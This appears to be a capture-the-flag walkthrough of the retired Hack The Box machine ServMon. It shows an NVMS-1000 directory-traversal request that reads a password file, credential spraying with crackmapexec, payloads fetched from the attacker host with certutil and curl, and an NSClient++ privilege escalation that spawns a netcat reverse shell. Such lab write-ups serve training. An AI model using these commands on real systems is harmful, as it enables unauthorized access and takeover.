HTB Walkthrough: ServMon w/o Metasploit (retired)
ServMon is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: ServMon| Difficulty Level: Easy | Operating System: Windows
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# nmap -sC -sV -Pn -oA ServMon 10.10.10.184
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–06 19:12 EDT
Nmap scan report for 10.10.10.184
Host is up (0.085s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01–18–20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
|_ Sat:Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020–01–14T13:24:20
|_Not valid after: 2021–01–13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=5/6%Time=609477DE%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,74,”HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation:
SF:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(HTTPOptions,3
SF:6,”HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20
SF:found”)%r(FourOhFourRequest,36,”HTTP/1\.1\x20404\r\nContent-Length:\x20
SF:18\r\n\r\nDocument\x20not\x20found”)%r(RTSPRequest,36,”HTTP/1\.1\x20404
SF:\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found”)%r(SIPOption
SF:s,36,”HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\
SF:x20found”);
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 14m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021–05–06T23:27:41
|_ start_date: N/A
Enumeration
Anonymous login is allowed. Exploring FTP to find sensitive/interesting files.
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# ftp 10.10.10.184
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01–18–20 12:06PM <DIR> Nadine
01–18–20 12:08PM <DIR> Nathan
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01–18–20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
ftp> cd Nathan
250 CWD command successful.
ftp> get “Notes to do.txt”
local: Notes to do.txt remote: Notes to do.txt
Viewing the contents of files obtained from FTP
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# cat Confidential.txt
Nathan,I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.Regards
Nadine
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
This reveals a login page. http://10.10.10.184/Pages/login.htm
From FTP, we know there is a public access to NVMS. Looking in searchsploit for vulnerabilities:
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit NVMS
NVMS 1000 — Directory Traversal
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit -m hardware/webapps/47774.txt
From above exploit, NVMS is vulnerable to LFI.
Exploitation
Replicating the exploit in Burpsuite.
Let us try to extract Passwords.txt from Nathan’s desktop file as hinted in Condential.txt (FTP)
Request:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.184/
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0v
Tried NVMS-1000 and NSClient++ with users and passwords but was unable to login. Let us try SMB enumeration using crackmapexec.
Users.txt includes admin, nathan and nadine. Passwords.txt includes the password extracted from LFI. Using crackmap exec to get a valid login. We found a match for user Nadine.
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:<password>
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# crackmapexec smb 10.10.10.184 -u Nadine -p <matched-password>@W0rk — shares
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:L1k3B1gBut7s@W0rk
SMB 10.10.10.184 445 SERVMON [+] Enumerated shares
SMB 10.10.10.184 445 SERVMON Share Permissions Remark
SMB 10.10.10.184 445 SERVMON — — — — — — — — — — — —
SMB 10.10.10.184 445 SERVMON ADMIN$ Remote Admin
SMB 10.10.10.184 445 SERVMON C$ Default share
SMB 10.10.10.184 445 SERVMON IPC$ READ Remote IPC
Enumerating IPC share since it has READ permissions
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# smbmap -H 10.10.10.184 -u Nadine -p <matched-password>@W0rk -R IPC$
Unable to read any file. Let us try using crackmapexec for SSH with the same credentials
Using crackmapexec for SSH using ‘Nadine’ and passwords.txt and we found a match for same SMB credentials.
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# crackmapexec ssh 10.10.10.184 -u nadine -p passwords.txt
Trying SSH into the box using above credentials and it is successful.
Microsoft Windows [Version 10.0.18363.752]
© 2019 Microsoft Corporation. All rights reserved.nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadineYou will get user flag.
Privilege Escalation
Browse to https://10.10.10.184:8443
Use Chromium for browsing as firefox does not load the page correctly.
When you click ‘forget password’, you will get below pop-up:
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit NSClient
NSClient++ 0.5.2.35 — Privilege Escalation
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit -m windows/local/46802.txt
Verifying NSClient++ version on target:
nadine@SERVMON C:\Program Files\NSClient++>nscp.exe — version
NSClient++, Version: 0.5.2.35 2018–01–28, Platform: x64
So it is vulnerable to above exploit. Following the steps mentioned in the exploit.
(a) On ssh session enter below commands:
nadine@SERVMON C:\Program Files\NSClient++>nscp web — password — display
Current password: <Web admin password>
(b) Verifying that ‘CheckExternalScripts’ and ‘Scheduler’ is enabled on C:\Program Files\NSClient++\nsclient.ini
c) Transfering evil.bat and nc.exe to target from kali
nadine@SERVMON C:\Temp>Certutil -urlcache -f “http://<Kali IP>:8000/evil.bat" evil.bat
**** Online ****
CertUtil: -URLCache command completed successfully.
Many methods of file transfer such as CertUtil, etc was getting denied. Curl worked.
Note: Use 64-bit nc.exe instead of kali version.
nadine@SERVMON C:\Temp> curl 10.10.XX.XX:8000/nc.exe -o nc.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 59392 100 59392 0 0 59392 0 0:00:01 — : — : — 0:00:01 527k
(d) Setup listener on Kali
┌──(root💀kali)-[~]
└─# nc -lvnp 9876
(e) From ‘C:\Program Files\NSClient++\nsclient.ini’, we can see that allowed host is 127.0.0.1. So, we need to SSH port forward through 127.0.0.1
; Undocumented key
allowed hosts = 127.0.0.1
SSH port forwarding:
In Kali: ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
Browse to https://localhost:8443 from Chromium. Enter web admin password obtained from nsclient.ini file and log in.
Performing step#5 from exploit: Add script foobar to call evil.bat and save settings.
Performing step#6 from exploit: Add schedulede to call script every 1 minute and save settings
The last step is to restart the computer and wait for connection. Google search for “nsclient++ restart” and you will come across this article: https://docs.nsclient.org/web/
On LHS, click ‘Control > Reload’ and you will get a reverse shell + root flag.
Alternate Privilege Escalation #1: Using API
For step 5,6, enter below curl commands:
(a) curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/evil.bat — data-binary “c:\Temp\nc.exe <Kali IP> 443 -e cmd.exe”
(b) curl -s -k -u admin https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat
c) curl -s -k -u admin https://localhost:8443/api/v1/queries/evil/commands/execute?time=1m.
You will get reverse shell and root flag
Alternate Privilege Escalation #2: Running script directly from Web Interface
Settings > External Scripts > Scripts > Add a simple script
In Web Console, run ‘Momo’ and you will get reverse shell.
